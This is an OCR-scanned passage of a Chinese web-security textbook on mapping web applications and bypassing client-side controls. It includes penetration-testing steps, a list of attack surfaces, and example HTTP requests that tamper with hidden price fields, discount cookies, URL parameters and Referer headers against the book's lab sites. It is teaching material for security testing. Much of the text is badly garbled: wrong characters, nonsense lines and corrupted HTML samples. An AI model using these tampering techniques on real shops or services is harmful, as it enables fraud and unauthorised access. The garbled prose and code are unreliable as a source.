应 用 程序 中 的 以 下 URL 为 例 : 

http://eis/pub/media/117/view 
在 功能 上 ， 此 URL 相 当 于 以 下 URL: 


http://eis/manager? 
schema=pub&type=media&id=117&action=view 

里 然 并 不 肯定 ， 但 media 资 源 集中 很 可 能 包含 资源 117， 并 且 应 
eee eae 
确认 这 一 点 。 
首先 需要 考虑 将 view 操 作 更 改 为 其 他 可 能 的 操作 ， 如 edit 或 add。 但 
是 ， 如 果 将 其 更 改 为 add 并 且 猜 测 是 正确 的 ， 则 该 操作 可 能 相当 于 
应 加 一 个 ID 为 117 的 资源 。 这 一 操作 将 会 失败 ， 因 为 已 经 存在 一 个 
ID 为 117 的 资源 。 最 佳 方案 是 ， 寻 找 ID 值 大 于 观察 到 的 最 大 ID 值 的 
add 操 作 ， 或 选择 任意 较 大 的 值 。 例 如 ， 可 以 请 求 以 下 URL: 











http://eis/pub/media/7337/add 
此 外 ， 还 有 必要 通过 修改 media (同时 保留 类 似 的 URL 结 构 ) 
来 寻找 其 他 数据 集合 : 


http://eis/pub/pages/1/view 
http://eis/pub/users/1/view 


渗透 测试 步 又 


(1) 检查 提交 到 应 用 程序 的 全 部 参数 的 名 称 和 参数 值 ， 了 解 
它们 支持 的 功能 。 

(2) 从 程序 员 的 角度 考虑 问题 ， 想 象 应 用 程序 可 能 使 用 了 哪 
些 服 务 器 器 机 制 和 技术 来 执行 能 够 观察 到 的 行为 。 


2. 推测 应 用 程序 的 行为 

通常 ， 应 用 程序 以 统一 的 方式 执行 其 全 部 功能 。 这 可 能 是 因为 不 同 
的 功能 由 同一 位 开发 者 编写 ， 或 者 可 遵循 相同 的 设计 规范 ， 或 者 共享 相 
同 的 代码 组 件 。 在 这 种 情况 下 ， 我 们 可 轻松 推 呆 出 服务 器 端 东 个 领域 的 
功能 ， 并 气 此 类 推 其 他 领域 的 功能 。 

例如 ， 应 用 程序 可 能 会 执行 杂种 全 局 输入 确认 检查 ， 如 在 处 理 前 净 
化 各 种 潜在 的 恶意 输入 。 确 定 一 个 SQL 言 注 漏洞 后 ， 会 遇 到 如 何 利 用 它 
的 问题 ， 因 为 专门 设计 的 请 求 正 被 输入 确认 远 辑 以 不 可 见 的 方式 修改 。 
然而 ， 应 用 程序 中 可 能 还 有 其 他 功能 为 正在 执行 的 净化 提供 恨 好 的 反 
馈 ， 例如， 将 用 户 提 交 的 数据 “反映 ”给 浏览 费 的 功能 。 可 以 使 用 这 项 功 
能 测试 不 同 编码 及 SQL 注 入 有 效 载 丛 的 各 种 变化 形式 的 有 效 性 ， 判 定 在 
应 用 输入 确认 逻辑 后 ， 必 须 提 交 哪 些 原 始 输 入 才能 获得 想 要 的 攻击 字符 
趾 。 如 采 笠 运 ， 会 发 现 整个 应 用 程序 使 用 相同 的 确认 机 制 ， 让 攻击 者 可 
以 利用 注入 漏洞 。 

当 在 客户 端 保 存 敏感 数据 时 ， 一 些 应 用 程序 可 使 用 定制 的 模糊 处 理 
方 采 ， 防 止 用 户 随 意 查阅 和 修改 这 些 数据 (请 参阅 第 5 革 了解 相 关内 
容 ) 。 由 于 只 能 访问 一 个 经 过 模糊 处 理 的 数据 样本 ， 这 类 模糊 处 理 方 案 
可 能 非常 难以 解 译 。 然 而 ， 应 用 程序 中 可 能 具有 茶 些 功能 ， 用 户 问 其 所 
交 模 糊 字 符 串 即 可 获得 原始 字符 串 。 例 如 ， 错 误 消息 中 可 能 包含 导致 错 
误 的 反 模 糊 处 理 数 据 。 如 采 整 个 应 用 程序 使 用 相同 的 模糊 处 理 方案 ， 束 
可 以 从 菏 个 位 置 《 如 cookie 中 ) 提取 一 个 模糊 字符 串 ， 将 其 提交 给 其 他 
功能 ， 解 译 出 它 的 意义 。 而 且 ， 我 们 还 可 以 对 模糊 处 理 方案 执行 逆向 工 
程 ， 系 统 地 同 该 功能 提交 各 种 数据 并 监控 反 模 糊 处 理 后 得 到 的 结 

最 后 ， 应 用 程序 处 理 各 种 错误 的 方式 并 不 一 致 ， 一 些 区 域 合理 防御 
并 处 理 错 误 ， 而 另外 一 些 区 域 则 简单 放 弃 错误 ， 辐 用户 返回 元 长 的 调试 
信息 请 参阅 第 15 半 了 解 相 关内 容 ) 。 在 这 种 情况 下 ， 我 们 可 以 从 某 个 





























区 域 返 回 的 错误 消 轧 中 收集 相关 信息 ， 并 将 其 应 用 于 合理 处 理 错 误 的 其 
他 区 域 。 例 如 ， 通 过 系统 化 地 操纵 请 求 参数 并 监控 得 到 的 错误 消 轧 ， 可 
以 判定 相关 应 用 程序 组 件 的 内 部 结构 和 逻辑 ， 和 幸运 的 话 会 发 现 这 个 结构 
的 茶 些 方面 还 被 沿用 到 其 他 区 域 。 


渗透 测试 步 又 


(1) 确定 应 用 程序 中 任何 可 能 包含 与 其 他 区 域内 部 结构 和 功 
能 有 关 的 线索 的 位 置 。 

(2) 即使 暂时 无 法 获得 任何 肯定 的 结论 ， 但 是 ， 在 后 期 试图 
利用 任何 潜在 的 漏洞 时 ， 确 定 的 情况 可 能 会 有 用 。 


3. 隔离 独特 的 应 用 程序 行为 

有 时 ， 情 况 可 能 恰恰 相反 。 许 多 可 靠 或 成 熟 的 应 用 程序 采用 一 致 的 
框架 来 防止 各 种 类 型 的 攻击 ， 如 跨 站 点 脚本 、SQL 注 入 和 未 授权 访问 。 
在 这 关 情 况 下 ， 最 可 能 发 现 漏洞 的 区 域 ， 是 应 用 程序 中 后 续 添 加 或 “ 拼 
接 ” 而 其 常规 安全 框架 不 会 处 理 的 部 分 。 此 外 ， 这 些 部 分 可 能 没有 通过 
验证 、 会 话 管理 和 访问 控制 与 应 用 程序 进行 正确 连接 。 一 般 情况 下 ， 通 
过 GUI 外 观 、 参 数 命 名 约定 方面 的 差异 ， 或 者 直接 通过 源 代 码 中 的 注释 
即 可 确定 这 些 区 域 。 








渗透 测试 步 又 


(1) 记录 其 使 用 的 标准 GUI 外 观 、 参 数 命 名 或 导航 机 制 与 应 
用 程序 的 其 他 部 分 不 同 的 任何 功能 。 

(2) 同时 记录 可 能 在 后 续 添加 的 功能 ， 包 括 调试 功能 、 
CAPTCHA 控 件 、 使 用 情况 跟踪 和 第 三 方 代码 。 

(3) 对 这 些 区 域 进行 全 面 检查 ， 不 要 假定 在 应 用 程序 的 其 他 
区 域 实施 的 标准 防御 在 这 些 区 域 也 同样 适用 。 


4.2.4 EISI 


解析 过 程 的 最 后 一 个 步骤 是 确定 应 用 程序 骏 露 的 各 种 受 攻击 面 ， 以 
及 与 每 个 受 攻击 面 有 关 的 潜在 漏洞 。 下 面 简 要 说 明 渗透 测试 员 能 够 确定 
的 一 些 主要 行为 和 功能 ， 以 及 其 中 最 可 能 发 现 的 漏洞 。 本 书 的 其 他 内 容 
将 详细 讨论 渗透 测试 员 如 何在 实际 操作 过 程 中 探测 并 利用 这 些 漏洞 。 
O 客户 端 确认 一 一 服务 器 没有 采用 确认 检查 。 
D 数据 库 交 互 一 一 SQL 注 入 。 
口 文件 上 传 与 下 载 一 一 路 径 过 历 漏洞 、 保 存 型 路 站 点 脚本 。 
口 显示 用 户 提 交 的 数据 一 一 路 站 点 脚本 。 
O 动态 重 定 同 一 一 重 定 癌 与 消息 头 注 入 攻击 。 
O 社交 网 络 功能 一 一 用 户 名 枚 举 、 保 存 型 跨 站 后 脚本 。 
口 登录 一 一 用 户 名 枚 举 、 脆 弱 密码 、 能 使 用 弯 力 。 






























































口 多 阶段 登录 一 一 登录 缺陷 。 

O 会话 状态 一 一 可 推测 出 的 令 牌 、 令 牌 处 理 不 安全 。 

口 访问 控制 一 一 水 平权 限 和 垂直 权限 提升 。 

口 用 户 伪 装 功 能 一 一 权限 提升 。 

口 使 用 明文 通信 一 一 会 话 劫持 、 收 集 证 书 和 其 他 敏感 数据 。 
口 站 外 链接 一 一 Referer 消 轧 头 中 查询 字符 串 参 数 泄漏 。 
口外 部 系统 接口 一 一 处 理会 话 与 /或 访问 控制 的 快捷 方式 。 
口 错误 消息 一 一 信息 泄漏 。 

口 电子 邮件 交互 一 一 电子 邮件 与 命令 注入 。 


O 本 地 代码 组 件 或 交互 一 一 缓冲 区 淤 出 。 


口 使 用 第 三 方 应 用 程序 组 件 一 已 知 漏洞 。 
口 已 确定 的 web 服务 器 软件 常见 配置 薄弱 环节 、 已 知 软件 程序 
陷 。 


4.2.5 fi}; Extreme Internet Shopping 


解析 EIS 应 用 程序 的 内 容 和 功能 后 ， 攻 击 者 可 以 通过 各 种 路 径 对 该 
应 用 程序 实施 攻击 ， 如 图 4-15 所 示 。 


$ burp suite professional 
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/auth 目 录 包 含 验证 功能 。 为 此 ， 有 必要 仔细 检查 所 有 验证 功能 、 会 
话 处 理 和 访问 控制 ， 包 括 其 他 内 容 搜索 攻击 。 

在 /core 路 径 内 ， 站 点 状态 页 < 面 似乎 接受 由 管 道 符 〈 | ) 分 隔 的 参数 
构成 的 数组 。 除 传统 的 基于 输入 的 攻击 外 ， 还 可 以 对 source、location 和 





IP 这 些 值 实施 蛋 力 攻击 ， 以 揭示 有 关 其 他 用 户 或 在 pageID 中 指定 的 页 面 
的 详细 信息 。 另 外 ， 还 可 以 搜索 有 关 无 法 访问 的 资源 的 信息 ， 或 者 在 
pageID 中 尝试 使 用 通配符 ， 如 pageID=all 或 pageID=*。 最 后 ， 由 于 显示 
的 pageID 值 中 包含 料 枉 ， 这 表示 应 用 程序 可 能 正 从 文件 系统 检索 资源 ， 
因而 可 以 对 其 实施 路 径 遇 有 历 攻 击 。 

/gb 路 径 包 含 该 站 点 的 留言 板 。 访 问 此 页 面 后 有 发现， 这 是 一 个 由 管 
理 员 主 持 的 讨论 论坛 。 虽 然 其 中 的 消息 由 管理 员 进 行 管理 ， 但 却 采 用 了 
登录 避 开 机 制 login=true， 这 说 明 攻 击 者 可 以 洽 试 批准 恶意 消息 〈 以 实施 
器 站 点 脚本 攻击 ) ， 以 及 阅读 其 他 用 户 发 送 给 管理 员 的 私有 消息 。 

Ahome 路 径 似乎 保存 的 是 经 过 验证 的 用 户 内 容 。 基 于 这 一 点 ， 攻 击 
者 可 以 尝试 实施 水 平权 限 提升 攻击 ， 以 访问 其 他 用 户 的 个 人 信息 ， 并 确 
保 在 每 个 页 面 实施 了 访问 控制 。 

快速 检查 后 发 现 ，/icons 和 /images 路 径 保存 的 是 静态 内 容 。 这 说 明 
可 以 尝试 对 属于 第 三 方 软件 的 图 标 名 称 实施 蛮 力 攻击 ， 并 检查 这 些 目录 
的 目录 索引 ， 但 不 必 做 过 多 尝试 。 

/pub 路 径 的 /pub/media 和 /pubmuser 目 录 下 包含 的 是 REST 风 格 的 资 
源 。 这 说 明 可 以 针对 /pub/user/11 中 的 数字 值 实施 蛋 力 攻击 ， 以 但 找 其 他 
应 用 程序 用 户 的 个 人 资料 页 面 。 与 此 功能 类 似 的 社交 网 络 功能 可 以 揭示 
用 户 信 息 、 用 户 名 和 其 他 用 户 的 登录 状态 。 

/shop 路 径 中 包含 网 上 购物 站 点 和 大 量 URL。 但 是 ， 这 些 URL 的 结构 
大 致 相同 。 仪 查看 一 或 两 个 URL， 攻 击 者 就 可 以 确定 所 有 相关 的 受 攻击 
面 。 购 物 过 程 中 可 能 包含 有 趣 的 逻辑 缺陷 ， 攻 击 者 可 以 利用 这 些 缺 陷 获 
得 未 授权 折扣 或 逃避 支付 。 





























渗透 测试 步 又 


(1) 了 解 应 用 程序 执行 的 核心 功能 和 使 用 的 主要 安全 机 制 。 

(2) 确定 通常 与 常见 漏洞 有 关 的 应 用 程序 功能 和 行为 特点 。 

(3) 在 公共 漏洞 数据 库 〈 如 www.osvdb.org) 中 检查 任何 第 三 
方 代 码 ， 以 确定 任何 已 知 问题 。 

(4) 制订 攻击 计划 ， 优 先 考虑 最 可 能 包含 漏洞 的 功能 ， 以 及 
最 严重 的 漏洞 。 








4.3 ”小结 


解析 应 用 程序 是 癌 其 发 动 攻击 的 重要 前 提 。 虽 然 直接 发 动 攻击 并 开 
始 探查 实际 漏洞 的 做 法 十 分 具有 吸引 力 ， 但 详细 了 解 应 用 程序 的 功能 、 
技术 与 受 攻击 面 更 利于 后 面 的 攻击 。 

在 几乎 所 有 的 Web 应 用 程序 攻击 中 ， 在 采用 手动 技巧 的 同时 ， 适 当 
采用 受 控 的 目 动 化 技巧 是 最 有 效 的 攻击 手段 。 几 乎 不 存在 任何 完全 目 动 
化 的 工具 ， 能 够 对 应 用 程序 进行 安全 、 彻 底 的 解析 。 要 解析 应 用 程序 ， 
RE N se coe een eal 
RIL. 

O 手动 浏览 和 用 户 指定 的 抓 取 ， 枚 举 应 用 程序 的 可 见 内 容 与 主要 功 


口 使 用 蛮 力 结合 人 为 干预 和 直觉 发 现 尽 可 能 多 的 隐藏 内 容 。 
口 对 应 用 程序 进行 智能 分 析 ， 确 定 其 关键 功能 、 行 为 、 安 全 机 制 与 


技术 。 
口 评估 应 用 程序 的 受 攻 击 面 ， 确 定 最 易 受 到 攻击 的 功能 和 行为 ， 对 
其 执行 更 有 针对 性 的 探查 ， 以 肥 现 可 供 利用 的 漏洞 。 
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4.4 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 
(1) 当 解 析 一 个 应 用 程序 时 ， 会 遇 到 以 下 URL: 


https://wahh-app.com/CookieAuth.dll?GetLogon? 
curl=Z2Fdefault.aspx 
y a 以 推论 出 服务 器 使 用 何 种 技术 ?该 搁 术 的 运作 方式 可 能 是 怎 
+H? 
(2) 如 果 所 针对 的 应 用 程序 是 一 个 web 论坛 ， 并 且 只 发 现 了 一 个 
URL: 


http://wahh-app.com/forums/ucp.php?mode=register 
如 何 通 过 它 获 得 论坛 成 员 列 表 ? 
(3) 当 解 析 一 个 应 用 程序 时 ， 遇 到 以 下 URL: 


https://wahh-app.com/public/profile/Address.asp? 
action=view&location=default 


据 此 推断 服务 器 问 应 使 用 何 种 技术 。 可 能 还 存在 哪些 其 他 内 容 和 功 


au 
BE? 


(4) Web 服 务 器 的 一 个 啊 应 包含 以 下 消 妃 头 : 


Server: Apache-Coyote/1.1 

这 表示 服务 右 使 用 何 种 技术 ? 

(5) 假设 正在 解析 两 个 不 同 的 Web 应 用 程序 ， 在 每 个 应 用 程序 中 
请 求 URL/admin.cpf。 每 个 请 求 返回 的 响应 消息 头 如 下 所 示 。 仅 由 这 些 
消息 头 能 否 确 定 每 个 应 用 程序 中 存在 所 请 求 的 资源 ? 





HTTP/1.1 200 OK 

Server: Microsoft-II$/5.0 

Expires: Mon, 20 Jun 2011 14:59:21 GMT 

Content-Lecation: http://wahh- 
app.com/includes/error.ntm?404;http://wahh-app.com/admin.cpf 
Date: Mon, 20 Jun 2011 14:59:21 GMT 

Content-Type: text/html 

Accept-Ranges: bytes 

Content-Length: 2117 


HTTP/1.1 401 Unauthorized 

Server: Apache-Coyote/1.1 

WwWW-Authenticate: Basic realm="Wahh Administration Site" 
Content-Type: text/html;charset=utf-8 

Content-Length: 954 

Date: Mon, 20 Jun 2011 15:07:27 GMT 

Connection: close 


在 第 1 章 中 ， 我 们 提 到 ， 由 于 客户 端 可 提交 任意 输入 ，Web 应 用 
程序 的 核心 安全 因此 受到 威胁 。 尽 管 如 此 ， 大 部 分 的 Web 应 用 程序 仍然 
依靠 在 客户 端 执行 各 种 措施 ， 对 它 提交 给 服务 器 的 数据 进行 控制 。 通 
着 ， 这 种 做 法 造成 一 个 基本 的 安全 缺陷 : 用 户 能 够 完全 控制 客 尸 端 和 由 
An 











应 用 程序 依靠 客户 问 控 件 限 制 用 尸 输入 表现 在 两 个 方面 : 首先， 应 
用 程序 可 通过 客户 端 组 件 ， 使 用 某 种 它 认 为 可 防止 用 户 修 改 的 机 制 传 送 
数据 。 其 次 ， 应 用 程序 可 在 客户 端 执行 保护 措施 ， 控 制 用 户 与 其 客户 端 
的 交互 ， 从 而 对 功能 实施 限制 ， 并 (或 ) 在 提交 用 户 输 入 之 前 对 这 些 输 
入 进行 控制 。 我 们 可 通过 使 用 HTML 表 单 功 能 、 客 户 端 脚本 或 浏览 器 扩 
展 技术 实现 这 种 控制 。 
" 我 们 将 在 本 章 中 举例 说 明 各 种 客户 器 控件 并 分 析 避 开 这 些 控件 的 方 
ee 
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程序 的 开发 者 简单 地 认为 所 采用 的 传输 机 制 将 确 你 通过 客户 端 传送 的 数 
气 在 传送 过 程 中 不 会 遭 到 修改 。 

由 于 客户 端 问 服务 器 传送 的 一 切 内 容 部 完全 处 于 用 户 的 控制 范围 
内 ， 认 为 通过 客户 端 传送 的 数据 不 会 被 修改 ， 这 种 看 法 往往 是 错误 的 ， 
并 致使 应 用 程序 易于 遭受 一 种 或 几 种 攻击 。 

你 肯定 想 知 着 这 其 中 的 原因 。 如 果 一 个 特殊 的 数据 已 知 ， 并 由 服务 
强 指 定 ， 则 应 用 程序 需要 问 客 户 并 提交 这 个 值 ， 然 后 读 取 回 该 值 。 实 际 
上 ， 对 开发 者 而 言 ， 以 这 种 方式 编写 应 用 程序 往往 更 加 人 简单， 原因 如 


Ts 

口 这 样 做 不 必 人 退 踪 用 户 会 话 中 的 各 种 数据 。 减 少 每 次 会 话 保存 在 服 
务 器 上 的 数据 量 ， 同 时 还 能 提高 应 用 程序 的 性 能 。 

OW RAMA re PULSARS ask, AA, PUTER 
操作 时 ， 用 户 可 能 需要 与 多 台 服 务 器 进行 交互 ， 这 时 在 处 理 相 同 用 户 请 
求 的 主机 之 间 共 至 服务 器 端 数据 就 会 过 到 困难 。 那 么 ， 使 用 客户 并 传送 
数据 就 成 为 解决 这 个 问题 的 一 个 磊 具 吸引 力 的 方案 。 

口 如 果 应 用 程序 在 服务 器 上 采用 任何 第 三 方 组 件 ， 如 购物 车 ， 则 可 
能 很 难 或 无 法 修改 这 些 组 件 ， 因 此 ， 通 过 客户 端 传输 数据 就 成 为 集成 这 
些 组 件 的 最 简单 方式 。 

口 在 茶 些 情况 下 ， 跟 踩 服 务 圳 上 的 新 数据 可 能 需要 更 新 核心 服务 露 
端 API， 因 而 会 触发 正式 的 变更 管理 流程 和 回归 测试 。 这 时 ， 实 施 包 含 
客户 端 数据 传输 的 更 加 细 化 的 解决 方案 可 以 避免 这 种 情况 ， 从 而 满足 紧 
凑 的 完工 期 限 要 求 。 

但 是 ， 以 这 种 方式 传送 敏感 数据 通常 并 不 安全 ， 并 且 会 在 应 用 程序 


























中 造成 大 量 漏洞 。 


He 
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隐藏 HIML 表 单字 段 是 一 种 表面 看 似 无 法 修改 ， 通 过 客户 端 传送 数 
据 的 第 用 机 制 。 如 果 一 个 表单 标记 为 隐藏 ， 它 就 不 会 显示 在 屏幕 上 。 但 
是 ， 用 户 提交 表单 时 ， 保 存在 表单 中 的 字段 名 称 和 值 仍 被 送 交 给 应 用 程 





a 








在 隐藏 表单 字段 中 保存 产品 价格 的 零售 应 用 程序 就 是 存在 这 种 安全 
缺陷 的 典型 示例 。 在 Web 应 用 程序 发 展 的 早期 阶段 ， 这 种 漏洞 极其 普 
遍 ， 现 在 也 绝 没有 消失 。 典 型 的 表单 如 图 5-1 所 示 。 


ease enter the reqeared quantity: 





Product: i> 92 Ultimate 
Price: 449 


Quantity: (Maximum quantity is 59) 





图 5-1 典型 的 HTML 表 单 


创建 这 个 表单 的 代码 如 下 : 


<form method="pest" action="Shop.aspx?prod=1"> 

Product: iPhone 5 <br/> 

Price: 449 <br/> 

Quantity: <input type="text" name="quantity"> (Maximum quantity is 50) 
<br/> 

<input type="hidden" name="price" value="449"> 

<input type="submit" value="Buy"> 

</form> 


注意 ， 表 单字 段 名 为 price， 其 被 标记 为 隐藏 。 用 户 提交 表单 时 ， 这 个 字 
段 将 被 送 交 给 服务 器 : 
POST /shop/28/Shop.aspx?prod=1 HTTP/1.1 
Host: mdsec.net 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 20 





quantity=l&éprice=449 


Al, yn vw) 
笑 试 访问 
http://mdsec.net/shop/28/ 


现在 ， 虽 然 price 字 上 段 并 未 显示 在 屏幕 上 ， 用 户 无 法 对 其 进行 编辑 ， 
但 这 只 是 因为 应 用 程序 指示 浏览 器 隐藏 该 字段 而 已 。 因 为 在 客户 端 进行 
cat 用 户 需要 编辑 价格 时 束 可 解除 这 个 限 
Ijo 

要 实现 编辑 操作 ， 一 种 方法 是 保存 HIML 页面 的 源 代 码 ， 编 辑 字段 
的 值 ， 然 后 将 源 代 码 重新 载 入 浏览 器 ， 并 单 击 Buy 按 钮 。 但 是 ， 使 用 拦 
es (intercepting proxy) 对 数据 进行 动态 修改 更 加 简单 方 
E 


在 攻击 Web 应 用 程序 时 ， 拦 截 代理 服务 器 极其 有 用 ， 它 是 一 种 不 可 
或 缺 的 工具 。 我 们 可 以 找到 大 量 拦截 代理 服务 占 工 具 ， 本 书 使 用 其 中 一 
位 作者 编写 的 Burp Proxy 工 具 。 

代理 服务 器 位 于 Web 浏 览 器 和 目标 应 用 程序 之 间 。 它 拦截 应 用 程序 
发 布 和 收 到 的 每 一 个 HTTP 或 HTTPS 请 求 和 响应 。 用 户 可 通过 它 拦截 任 
何 消 息 ， 对 其 进行 检查 或 修改 。 如 果 之 前 从 未 用 过 拦截 代理 服务 器 ， 请 
参阅 第 20 章 了 解 有 关 拦 截 代 理 服务 器 的 运行 机 制 ， 如 何 配 置 和 使 用 拦截 
代理 服务 器 的 详细 信息 。 

安装 拦截 代理 服务 器 并 进行 相应 配置 后 就 可 以 拦截 提交 表单 的 请 
求 ， 随 意 修改 price 字 段 的 值 ， 如 图 5-2 所 示 。 
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图 5-2 EEE RR a Ee Bi ek he AA BC E 
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价格 购买 该 产品 。 








YV 提示 “如 果 发 现 应 用 程序 易于 受到 这 种 攻击 ， 看 看 是 否 可 
以 提交 一 个 负数 价格 值 。 有 些 时 候 ， 应 用 程序 居然 接受 使 用 负数 价 
格 值 的 交易 。 攻 击 者 不 仅 收 到 订购 的 货物 ， 信 用 卡 还 会 收 到 退 款 

一 一 种 两 面 得 利 的 情况 〈 如 果 出 现 这 种 情况 的 话 ) 。 


5.1.2 HTTP cookie 
HTTP cookie 是 通过 客户 端 传送 数据 的 男 一 种 常用 机 制 。 和 隐藏 表 


单字 段 一 样 ，HTTP cookie 一 般 并 不 显示 在 屏 融 上 ， 也 不 可 由 用 户 直 接 
修改 。 当 然 ， 用 户 可 使 用 拦截 代理 服务 器 ， 通 过 更 改 设置 cookie 的 服务 





器 响应 或 随后 发 布 这 些 cookie 的 客户 端 请 求 ， 对 HTTP cookie 进 行 修改 。 
下 面 以 前 面 的 示例 〈 稍 作 修 改 ) 为 例 进行 说 明 。 消 费 者 登录 应 用 程 
序 后 ， 收 到 以 下 啊 应 : 
HTTP/1.1 200 OK 


Set-Cookie: DiscountAgreed=25 





Content-Length: 1530 


DiscountAgreed cookie 是 依靠 客户 端 控 件 〈 基 于 cookie 一 般 无 法 被 修 
改 这 个 事实 ) 保护 通过 客户 端 传送 的 数据 的 典型 示例 。 如 果 应 用 程序 信 
任 DiscountAgreed cookie 返 回 给 服务 器 的 值 ， 那 么 消费 者 修改 这 个 值 束 
可 获得 任意 折扣 。 例 如 : 

POST /shop/92/Shop.aspx?prod=3 HTTP/1.1 
Host: mdsec.net 


Content-Length: 10 


quantity=1 


尝试 访问 


http://mdsec.net/shop/92/ 


5.1.3 URL 参 类 


应 用 程序 常常 使 用 预先 设 定 的 URL 参 数 通过 客户 端 传 送 数 据 。 例 
NE Teh ele Tees el E g EE Eae 


http://mdsec.net/shop/?prod=3&pricecode=32 

如 果 包 含 参 数 的 URL 显 示 在 浏览 器 的 地 址 栏 中 ， 任 何 用 户 不 需要 使 
用 工具 就 可 任意 修改 其 中 的 参数 。 但 是 ， 在 许多 情况 下 ， 应 用 程序 并 不 
希望 普通 用 户 查 看 或 修改 URL 参 数 。 例 如 : 

口 使 用 包含 参数 的 URL 加 载 岁 入 图 像 时 ; 

口 使 用 包含 参数 的 URL 加 载 框架 内 容 时 ; 

口 表 单 使 用 POST 方 法 并 且 其 目标 URL 包 含 预 完 设 定 的 参数 时 ; 

口 应 用 程序 使 用 弹出 窗口 或 其 他 方法 隐藏 浏览 器 地 址 栏 时 。 

“A a a 
URLE 2X. 











5.1.4 Referer Ñ> 





浏览 器 在 大 多 数 HTTP 请 求 中 使 用 Referer 消 息 头 。 浏 览 器 使 用 这 个 
消息 头 指示 提出 当前 请 求 的 页 面 的 URL 或 者 是 因为 用 户 单 击 了 一 个 
超 链 接 或 提交 了 一 个 表单 ， 或 者 是 因为 该 页 面 引用 了 其 他 资源 (如 图 
像 ) 。 因 此 ， 我 们 可 以 利用 这 个 消息 头 通过 客户 端 传送 数据 ， 这 是 因为 
应 用 程序 处 理 的 URL 受 其 控制 ， 开 发 者 认为 Referer 消 息 头 可 用 于 准确 判 
断 某 个 特殊 的 请 求 由 哪个 URL 生 成 。 

以 帮助 忘记 密码 的 用 户 重 新 设置 密码 的 机 制 为 例 。 应 用 程序 要 求 用 
户 按 规定 的 顺序 完成 几 个 步 又 ， 然 后 再 通过 以 下 请 求 重 新 设置 密码 值 : 

GET /auth/472/CreateUser.ashx HTTP/1.1 








Host: mdsec.net 


Referer: https://mdsec.net/auth/472/Admin.ashx 
应 用 程序 可 以 使 用 Referer 消 息 头 证 实 这 个 请 求 是 在 正确 的 阶段 
(Admin.ashx) 提出 的 ， 然 后 才 人 允许 用 户 访 问 请 求 的 功能 。 

但 是 ， 因 为 用 户 控 制 着 每 一 个 请 求 ， 包 括 HTTP 消 息 涉 ， 他 可 以 直 
接 进入 CreateUser.ashx， 并 使 用 拦截 代理 服务 器 将 Referer 消 息 头 的 值 修 
改 为 应 用 程序 需要 的 值 ， 从 而 轻易 避 开 这 种 控制 。 

实际 上 ， 根 据 w3.org 标 准 ，Referer 消 息 头 完全 是 可 选 的 。 因 此 ， 虽 
然 大 多 数 浏 览 器 执行 这 个 消息 头 ， 但 是 ， 使 用 它 控 制 应 用 程序 的 功能 应 
被 视 为 是 一 种 “陈腐 ”的 做 法 。 





A IF 


http://mdsec.net/auth/472/ 


w 错误 观点 ”不 知 何故 ， 相 比 于 请 求 的 其 他 部 分 (如 

URL) ， 人 们 常常 认为 HTTP 消息 头 具 有 更 强 的 “ 防 算 改 ”能力 。 这 

会 导致 开发 者 实施 信任 由 Cookie 和 Referer 消 息 头 提交 的 值 的 功能 ， 

而 对 其 他 数据 (如 URL 参 数 ) 执行 严格 的 确认 。 这 种 认识 是 错误 的 
一 一 因为 任何 业余 黑客 在 攻击 应 用 程序 时 都 可 以 使 用 大 量 免费 的 拦 
截 代 理 服务 器 工具 轻松 修改 所 有 请 求 数据 。 打 个 比方 ， 假 如 老师 准 
备 搜查 你 的 书 保 ， 你 觉得 把 水 枪 藏 在 抽 居 底下 会 更 加 安全 ， 因 为 她 
maS MES AERE -o 


渗透 测试 步 又 


(1) 在 应 用 程序 中 ， 确 定 隐藏 表单 字段 、cookie 和 URL 参 数 明 
显 用 于 通过 客户 并 传送 数据 的 任何 情况 。 

(2) 根据 数据 出 现 的 位 置 以 及 参数 名 称 之 类 的 线索 ， 确 定 或 
骨 测 它 在 应 用 程序 逻辑 中 发 挥 的 作用 。 

(3) 修改 数据 在 应 用 程序 相关 功能 中 的 值 。 确 定 应 用 程序 是 
否 处 理 在 参数 中 提交 的 任意 值 ， 以 及 这 样 做 是 否 会 导致 应 用 程序 易 
于 遭受 任何 攻击 。 


5.1.5 fete 


有 时 候 ， 通 过 客户 端 传送 的 数据 被 加 密 或 进行 了 某 种 形式 的 模糊 处 
理 ， EA) Ti BEE EE AAE TE o 例如 ， 下 面 的 产品 价格 并 不 保存 在 隐藏 字段 
中 ， 而 是 以 隐 — - value) 的 形式 传送 。 





‘form method="post" ction="Shop. aspx?proc=4"> 
Product: Nokia Infin <br/> 
Price: 699 <br/> 
Quantity: <input type="text" name="quantity”’> (Maximum quantity is 50) 
<pr/> 
<input type=" naen" ee value="699" 
<input ac "hidden" name="pri J oken” 
value= 6D213 1B8P216D694A34 150265C989229"> 
<input type="submit" alue="Buy" 
</form> 


如 果 发 现 这 种 情况 ， 可 以 据 此 推 朵 ， 提 交 表 单 后 ， 服 务 咒 端 应 用 程 
序 将 检查 模糊 字符 串 的 完整 性 ， 或 对 其 进行 解密 或 去 模糊 处 理 ， 然 后 处 
理 它 的 明文 值 。 这 种 深层 次 处 理 可 能 易于 造成 各 种 漏洞 ;但 是 ， 要 探查 
或 利用 这 种 漏洞 ， 首 先 必须 对 有 效 载荷 进行 适当 的 处 理 。 





A IF 


http://mdsec.net/shop/48/ 


=> 注解 应 用 程序 的 会 话 处 理 机 制 通常 通过 客户 端 传送 模糊 
数据 。 在 HTTP cookie 中 传送 的 会 话 令 牌 、 在 隐藏 字段 中 传送 的 有 反 
CSRF 令 胜 ， 以 及 用 于 访问 应 用 程序 资源 的 一 次 性 UREL 令 牌 ， 全 都 
是 在 客户 端 算 改 的 潜在 目标 。 我 们 将 在 第 7 章 详细 讨论 针对 这 些 令 
牌 的 注意 事项 。 


渗透 测试 步 又 


有 几 种 方法 可 以 对 通过 客户 端 传送 的 模糊 数据 实施 攻击 。 

(1) 如 果 知 道 模糊 字符 串 的 明文 值 ， 可 以 尝试 破译 模糊 处 理 
所 使 用 的 模糊 算法 。 

(2) 如 第 4 章 所 述 ， 应 用 程序 的 其 他 地 方 可 能 包含 一 些 功 能 ， 
攻击 者 可 以 利用 它们 返回 由 自己 控制 的 一 段 明文 生成 的 模糊 字符 
品 。 在 这 种 情况 下 ， 攻 击 者 可 以 问 目 标 功 能 下 接 提 交 任 意 一 个 有 效 
Beal, BRAGA a BANAT AB o 

(3) 即使 模糊 字符 串 完 全 无 法 理解 ， 也 可 以 在 其 他 情况 下 重 
